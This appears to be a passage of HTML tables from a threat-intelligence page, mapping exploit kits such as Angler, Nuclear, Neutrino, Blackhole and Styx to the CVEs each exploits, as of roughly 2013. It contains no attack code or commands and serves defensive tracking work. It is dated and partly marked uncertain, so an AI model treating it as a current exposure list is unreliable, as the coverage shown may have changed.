<tr class="tableizer-firstrow"><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;">Gong Da / GonDad</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> Redkit 2.2</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> x2o (Redkit Light)</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;">Fiesta (=Neosploit) </span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;"> </span><span style="color: white; font-family: Times, Times New Roman, serif;">Cool Styxy</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> DotkaChef</span></th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CVE-2010-0188</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-5692</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-0507</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0074/3896</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3402</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-1493</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-1493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0431</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 109px;"><tbody>
<tr height="21" style="height: 15.75pt;"><td class="xl65" dir="LTR" height="21" style="height: 15.75pt; width: 82pt;" width="109">CVE-2013-0431</td></tr>
</tbody></table>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1889</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;"> CVE-2013-1493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-4681</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;"> CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-5076</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
</tbody></table>
<br />
<br />
<br />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;">Angler</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> FlashPack = SafePack</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> White Lotus</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;"> Magnitude (Popads)</span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;">Nuclear 3.x </span></th><th style="background-color: #104e8b; color: white;"><span style="font-family: Times, Times New Roman, serif;">Sweet Orange </span></th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0074/3896</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0074/3896</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3402</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-0507</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2471</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551 </span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-5329</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2471 ??</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
</tbody></table>
<br />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b;"><span style="color: white;">CK</span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;"> </span><span style="color: white; font-family: Times, Times New Roman, serif;">HiMan</span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif;"><span style="color: white;">Neutrino </span></span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;"> </span><span style="color: white; font-family: Times, Times New Roman, serif;">Blackhole (last)</span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif;"><span style="color: white;">Grandsoft </span></span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;"> </span><span style="color: white; font-family: Times, Times New Roman, serif;">Private EK</span></th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0431</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188 </span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2006-0003</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1889</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-4681</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2463*</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3544</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-4792*</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465*</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">and + all or some</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-1347</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">exploits</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2463</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-1493</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">* switch 2463*<>2465*</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">from the previous</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-3897</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">Possibly + exploits</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">version</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">* removed</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">from the previous</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">version</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
</tbody></table>
<br />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black; font-family: Arial, Helvetica, sans-serif; font-size: 12px;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b;"><span style="color: white;">Sakura 1.x</span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif; font-size: small;"> </span><span style="color: white; font-family: Times, Times New Roman, serif; font-size: small;">LightsOut</span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif; font-size: small;"><span style="color: white;">Glazunov </span></span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif; font-size: small;"><span style="color: white;">Rawin </span></span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif; font-size: small;"><span style="color: white;">Flimkit </span></span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif; font-size: small;"> </span><span style="color: white; font-family: Times, Times New Roman, serif; font-size: small;">Cool EK (Kore-sh)</span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif; font-size: small;"><span style="color: white;">Kore (formely Sibhost) </span></span></th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">cve-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2012-1723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2463</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2012-0507</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2012-1723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2423</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-1347</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">cve-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-1493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2463</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2460</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">and + all or some</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-1690</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2463</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">exploits</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">CVE-2013-2471</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif; font-size: small;">from the previous</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">version</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
</tbody></table>
<br />
<br class="Apple-interchange-newline" />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b;"><span style="color: white;">Styx 4.0</span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif;"><span style="color: white;">Cool </span></span></th><th style="background-color: #104e8b;"><span style="font-family: Times, Times New Roman, serif;"><span style="color: white;">Topic EK</span></span></th><th style="background-color: #104e8b;"><span style="color: white; font-family: Times, Times New Roman, serif;"> </span><span style="color: white; font-family: Times, Times New Roman, serif;">Nice EK</span></th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2010-0188</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-0755</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1723</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2011-3402</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1876</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2012-1723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0634</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-0422</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2465</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
